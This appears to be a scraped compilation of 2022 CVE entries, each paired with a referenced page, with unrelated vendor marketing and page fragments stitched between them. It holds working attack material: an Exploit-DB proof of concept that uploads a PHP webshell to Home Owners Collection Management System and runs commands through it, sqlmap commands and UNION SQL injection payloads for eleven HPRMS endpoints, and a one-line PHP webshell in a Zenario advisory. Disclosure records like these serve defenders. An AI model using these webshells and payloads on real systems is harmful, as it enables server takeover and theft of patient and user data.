Home Owners Collection Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the parameter "cover" in SystemSettings.php.

    # Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
    # Date: 9/02/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.sourcecodester.com/
    # Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
    # Version: 1.0
    # Tested on: XAMPP, Linux 
    
    # Request sent as base user
    
    POST /hocms/classes/SystemSettings.php?f=update_settings HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------31935477191495174627236953215
    Content-Length: 769
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/hocms/admin/?page=system_info
    Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju
    
    
    -----------------------------31935477191495174627236953215
    Content-Disposition: form-data; name="name"
    
    
    
    Home Owners Collection Management System'
    
    -----------------------------31935477191495174627236953215
    Content-Disposition: form-data; name="short_name"
    
    
    
    HOCMS  - PHP
    
    -----------------------------31935477191495174627236953215
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    
    
    
    -----------------------------31935477191495174627236953215
    Content-Disposition: form-data; name="cover"; filename="cmd.php"
    Content-Type: application/x-php
    
    
    
    <?php
    if($_REQUEST['s']) {
      system($_REQUEST['s']);
      } else phpinfo();
    ?>
    </pre>
    </body>
    </html>
    
    
    -----------------------------31935477191495174627236953215--
    
    
    # Response
    
    HTTP/1.1 200 OK
    Date: Wed, 09 Feb 2022 09:32:16 GMT
    Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1
    X-Powered-By: PHP/8.1.2
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Access-Control-Allow-Origin: *
    Content-Length: 1
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    
    
    1
    
    
    # ------------------------------------------------------------------------------------------
    # Request to webshell
    # ------------------------------------------------------------------------------------------
    
    GET /hocms/uploads/1644399120_cmd.php?s=echo+0xSaudi HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju
    Upgrade-Insecure-Requests: 1
    
    
    # ------------------------------------------------------------------------------------------
    # Webshell response
    # ------------------------------------------------------------------------------------------
    
    HTTP/1.1 200 OK
    Date: Wed, 09 Feb 2022 09:39:06 GMT
    Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1
    X-Powered-By: PHP/8.1.2
    Access-Control-Allow-Origin: *
    Content-Length: 33
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    
    
    0xSaudi
    </pre>
    </body>
    </html>

CVE-2022-25094: Offensive Security’s Exploit Database Archive

Zepl Notebooks before 2021-10-25 are affected by a sandbox escape vulnerability. Upon launching Remote Code Execution from the Notebook, users can then use that to subsequently escape the running context sandbox and proceed to access internal Zepl assets including cloud metadata services.

Skip to content

**Notebook-powered analytics**

![](http://zepl.com/wp-content/uploads/2020/05/ic-collaboration.svg "ic-collaboration")

**Share notebooks instantly**

Frustrated by trying to share your notebooks over email or Github? Zepl lets you import and share your Jupyter and Zeppelin notebooks with all your dependencies intact, so you can collaborate easily with your technical and non-technical colleagues.

![](http://zepl.com/wp-content/uploads/2020/05/ic-scale.svg "ic-scale")

**Get infinite compute resources for all your jobs**

Easily scale up and down any amount of compute resources for any number of users without a call to IT. You’ll have all the resources you need when you need them while only paying for what you use thanks to Zepl’s per-minute pricing.

![](http://zepl.com/wp-content/uploads/2020/05/ic-science.svg "ic-science")

**Pay only for what you use**

Still paying for resources even when they sit idle? Zepl’s container-based architecture spins up resources when you need them, and shuts them down when you don’t. So you never have to overpay for compute again.

**Data Science & Analytics for Your Entire Team**

Learn More

**Our Customers**

**About Zepl**

Zepl empowers your entire team to use data science and machine learning to analyze any cloud data warehouse by providing a secure platform for analytics in an easy-to-use notebook format.

From the creators of Apache Zeppelin, Zepl provides users all the tools they need to be successful analyzing data. Extensible at its core, Zepl integrates elegantly with the most powerful open-source notebooks on the market today, Jupyter and Apache Zeppelin (with more than 10 million downloads combined), as well as countless other popular frameworks. Data scientists, analysts, engineers, and executives – both technical and non-technical alike – can all unlock insights together in Zepl.

Go to Top

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. AcceptDecline

CVE-2021-42952: Zepl 2020 (logos slider test) – Nov 20 Edits

In Apache Airflow, prior to version 2.2.4, some example DAGs did not properly sanitize user-provided params, making them susceptible to OS Command Injection from the web UI.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-24288

A carefully crafted user preferences for submission could trigger an XSS vulnerability on Apache JSPWiki, related to the user preferences screen, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.11.2 or later.

CVE-2022-24948

Apache JSPWiki user preferences form is vulnerable to CSRF attacks, which can lead to account takeover. Apache JSPWiki users should upgrade to 2.11.2 or later.

CVE-2022-24947

It was discovered that the "Trigger DAG with config" screen was susceptible to XSS attacks via the `origin` query argument. This issue affects Apache Airflow versions 2.2.3 and below.

CVE-2021-45229

Hospital Patient Record Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/doctors/manage_doctor.php.

Permalink

Cannot retrieve contributors at this time

**Exploit Title: HPRMS - SQL injection****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html****Version: HPRMS 1.0****Tested on: Win10, Apache**

> Description

Some foreground SQL injection issues in HPRMS v.1.0, Available without admin login

> Vulnerability point

1.  http://localhost/hprms/admin/doctors/view\_doctor.php?id=1
2.  http://localhost/hprms/admin/doctors/manage\_doctor.php?id=1
3.  http://localhost/hprms/admin/patients/manage\_patient.php?id=1
4.  http://localhost/hprms/admin/patients/view\_history.php?id=1
5.  http://localhost/hprms/admin/patients/manage\_admission.php?id=1
6.  http://localhost/hprms/admin/patients/manage\_history.php?id=1
7.  http://localhost/hprms/admin/patients/view\_admission.php?id=1
8.  http://localhost/hprms/admin/room\_types/view\_room\_type.php?id=1
9.  http://localhost/hprms/admin/room\_types/manage\_room\_type.php?id=1
10.  http://localhost/hprms/admin/rooms/view\_room.php?id=1
11.  http://localhost/hprms/admin/rooms/manage\_room.php?id=1

> exploit

1.  python sqlmap.py -u http://localhost/hprms/admin/doctors/view\_doctor.php?id=1
    
2.  python sqlmap.py -u http://localhost/hprms/admin/doctors/manage\_doctor.php?id=1
    
3.  python sqlmap.py -u http://localhost/hprms/admin/patients/manage\_patient.php?id=1
    
4.  python sqlmap.py -u http://localhost/hprms/admin/patients/view\_history.php?id=1
    
5.  python sqlmap.py -u http://localhost/hprms/admin/patients/manage\_admission.php?id=1
    
6.  python sqlmap.py -u http://localhost/hprms/admin/patients/manage\_history.php?id=1
    
7.  python sqlmap.py -u http://localhost/hprms/admin/patients/view\_admission.php?id=1
    
8.  python sqlmap.py -u http://localhost/hprms/admin/room\_types/view\_room\_type.php?id=1
    
9.  python sqlmap.py -u http://localhost/hprms/admin/room\_types/manage\_room\_type.php?id=1
    
10.  python sqlmap.py -u http://localhost/hprms/admin/rooms/view\_room.php?id=1
    
11.  python sqlmap.py -u http://localhost/hprms/admin/rooms/manage\_room.php?id=1
    

> verify

1.  http://localhost/hprms/admin/doctors/view\_doctor.php?id=-7873' UNION ALL SELECT NULL,(select database()),(select user()),@@datadir,NULL,NULL,NULL,NULL-- -
2.  http://localhost/hprms/admin/doctors/manage\_doctor.php?id=-1485' UNION ALL SELECT NULL,(select database()),(select user()),@@datadir,NULL,NULL,NULL,NULL-- -
3.  view-source:http://localhost/hprms/admin/patients/manage\_patient.php?id=-93' UNION ALL SELECT CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL,NULL,NULL,NULL-- -
4.  http://localhost/hprms/admin/patients/view\_history.php?id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT((select database()),0x7e,(select user()))-- -
5.  view-source:http://localhost/hprms/admin/patients/manage\_admission.php?id=1' UNION ALL SELECT CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
6.  http://localhost/hprms/admin/patients/manage\_history.php?id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL-- -
7.  view-source:http://localhost/hprms/admin/patients/view\_admission.php?id=1' UNION ALL SELECT NULL,CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
8.  http://localhost/hprms/admin/room\_types/view\_room\_type.php?id=-3985' UNION ALL SELECT NULL,NULL,CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL-- -
9.  http://localhost/hprms/admin/room\_types/manage\_room\_type.php?id=-53' UNION ALL SELECT NULL,CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL,NULL-- -
10.  http://localhost/hprms/admin/rooms/view\_room.php?id=-87' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL,NULL-- -
11.  http://localhost/hprms/admin/rooms/manage\_room.php?id=-27' UNION ALL SELECT NULL,NULL,CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL,NULL,NULL-- -

> Vulnerability Details

Vulnerability Details 1 exploit：python sqlmap.py -u http://localhost/hprms/admin/doctors/view\_doctor.php?id=1 ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/1-1.png) verify：http://localhost/hprms/admin/doctors/view\_doctor.php?id=-7873' UNION ALL SELECT NULL,(select database()),(select user()),@@datadir,NULL,NULL,NULL,NULL-- - ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/1-2.png)  Vulnerability Details 2 exploit：python sqlmap.py -u http://localhost/hprms/admin/doctors/manage\_doctor.php?id=1 ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/2-1.png) verify：http://localhost/hprms/admin/doctors/manage\_doctor.php?id=-1485' UNION ALL SELECT NULL,(select database()),(select user()),@@datadir,NULL,NULL,NULL,NULL-- - ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/2-2.png)  Vulnerability Details 3 exploit：python sqlmap.py -u http://localhost/hprms/admin/patients/manage\_patient.php?id=1 ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/3-1.png) verify：view-source:http://localhost/hprms/admin/patients/manage\_patient.php?id=-93' UNION ALL SELECT CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL,NULL,NULL,NULL-- - ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/3-2.png)  Vulnerability Details 4 exploit：python sqlmap.py -u http://localhost/hprms/admin/patients/view\_history.php?id=1 ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/4-1.png) verify：http://localhost/hprms/admin/patients/view\_history.php?id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT((select database()),0x7e,(select user()))-- - ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/4-2.png)  Vulnerability Details 5 exploit：python sqlmap.py -u http://localhost/hprms/admin/patients/manage\_admission.php?id=1 ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/5-1.png) verify：view-source:http://localhost/hprms/admin/patients/manage\_admission.php?id=1' UNION ALL SELECT CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/5-2.png)  Vulnerability Details 6 exploit：python sqlmap.py -u http://localhost/hprms/admin/patients/manage\_history.php?id=1 ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/6-1.png) verify：http://localhost/hprms/admin/patients/manage\_history.php?id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL-- - ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/6-2.png)  Vulnerability Details 7 exploit：python sqlmap.py -u http://localhost/hprms/admin/patients/view\_admission.php?id=1 ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/7-1.png) verify：view-source:http://localhost/hprms/admin/patients/view\_admission.php?id=1' UNION ALL SELECT NULL,CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/7-2.png)  Vulnerability Details 8 exploit：python sqlmap.py -u http://localhost/hprms/admin/room\_types/view\_room\_type.php?id=1 ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/8-1.png) verify：http://localhost/hprms/admin/room\_types/view\_room\_type.php?id=-3985' UNION ALL SELECT NULL,NULL,CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL-- - ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/8-2.png)  Vulnerability Details 9 exploit：python sqlmap.py -u http://localhost/hprms/admin/room\_types/manage\_room\_type.php?id=1 ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/9-1.png) verify：http://localhost/hprms/admin/room\_types/manage\_room\_type.php?id=-53' UNION ALL SELECT NULL,CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL,NULL-- - ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/9-2.png)  Vulnerability Details 10 exploit：python sqlmap.py -u http://localhost/hprms/admin/rooms/view\_room.php?id=1 ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/10-1.png) verify：http://localhost/hprms/admin/rooms/view\_room.php?id=-87' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL,NULL-- - ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/10-2.png)  Vulnerability Details 11 exploit：python sqlmap.py -u http://localhost/hprms/admin/rooms/manage\_room.php?id=1 ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/11-1.png) verify：http://localhost/hprms/admin/rooms/manage\_room.php?id=-27' UNION ALL SELECT NULL,NULL,CONCAT((select database()),0x7e,(select user())),NULL,NULL,NULL,NULL,NULL-- - ![](https://github.com/09-by-ly/HPRMS-SQL_injection/raw/gh-pages/img/11-2.png)

CVE-2022-25004: HPRMS-SQL_injection/SQL injection.md at gh-pages · 09-by-ly/HPRMS-SQL_injection

The Essential Addons for Elementor Lite WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the settings parameter found in the ~/includes/Traits/Helper.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 5.0.8.

CVE-2022-0683: Vulnerability Advisories - Wordfence

A Cross Site Scripting (XSS) vulnerability exists in RosarioSIS before 4.3 via the SanitizeMarkDown function in ProgramFunctions/MarkDownHTML.fnc.php.

Hi @francoisjacquet

I believe to have found a Stored XSS Vulnerability in RosarioSIS. I decided not to go into any specifics here (yet). I would appreciate it if you could get back to me with your preferred way of talking about this, because I couldn't find any information on how to talk about security related issues.

For completeness' sake:

*   The RosarioSIS version is the latest one (commit 6549919d)
*   PHP version: 7.2.13
*   PostgreSQL version: 10.6
*   Server: Apache 2.4.29 (Ubuntu)
*   Browser: Mozilla Firefox 64.0 (Ubuntu)

Regards

To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information

CVE-2021-44566: Stored XSS Vulnerability (#259) · Issues · François Jacquet / rosariosis

Zenario CMS 9.2 allows an authenticated admin user to bypass the file upload restriction by creating a new 'File/MIME Types' using the '.phar' extension. Then an attacker can upload a malicious file, intercept the request and change the extension to '.phar' in order to run commands on the server.

**Summary**

**Name**

Zenario CMS 9.2 - Insecure file upload (RCE)

**Code name**

Simone

**Product**

Zenario CMS

**Affected versions**

9.2

**Fixed versions**

9.2.55826

**State**

Public

**Release date**

2022-02-18

**Vulnerability**

**Kind**

Insecure file upload (RCE)

**Rule**

027\. Insecure file upload

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CVSSv3 Base Score**

9.1

**Exploit available**

No

**CVE ID(s)**

CVE-2022-23043

**Description**

Zenario CMS 9.2 allows an authenticated admin user to bypass the file upload restriction by creating a new `File/MIME Types` using the `.phar` extension. Then an attacker can upload a malicious file, intercept the request and change the extension to `.phar` in order to run commands on the server.

**Proof of Concept**

Steps to reproduce

1.  Once login as admin click on 'Go to Organizer'> 'Configuration'.
    
2.  Select 'File/MIME Types' in the 'Configuration' menu.
    
3.  Click on 'Create'.
    
4.  Create a new custom file type using 'phar' as extension and 'text/plain' as MIME Type and then click on 'Save'.
    
    The server validates some malicious extensions but still there are some valid executable extensions. For example 'phar' and 'shtml'.
    
5.  Create a '.phar' file with the following content.
    
        <?php echo system($_GET['cmd']); ?>
        
    
6.  On the admin menu, click on 'Documents'
    
7.  Click on 'Upload documents'
    
8.  Click on 'Upload...' and browse the created file.
    
9.  Select 'Public' and click on 'Save'.
    
10.  Select the file and click on 'Actions' > 'View public link' in order to get the file location.
    
11.  Go to the url in the browser.
    

System Information

*   Version: Zenario CMS 9.2.
*   Operating System: Linux.
*   Web Server: Apache
*   PHP Version: 7.4
*   Database and version: Mysql

**Exploit**

There is no exploit for the vulnerability but can be manually exploited.

**Mitigation**

An updated version of Zenario CMS is available at the vendor page..

**Credits**

The vulnerability was discovered by Oscar Uribe from the Offensive Team of `Fluid Attacks`.

**References**

**Vendor page**

https://zenar.io/

**Patched version**

https://github.com/TribalSystems/Zenario/releases/tag/9.2.55826

**Timeline**

*   2022-01-13: Vulnerability discovered.
    
*   2022-01-13: Vendor contacted.
    
*   2022-01-14: Vendor replied acknowledging the report.
    
*   2022-02-08: Vulnerability patched.
    
*   2022-02-18: Public Disclosure.

Tag

#apache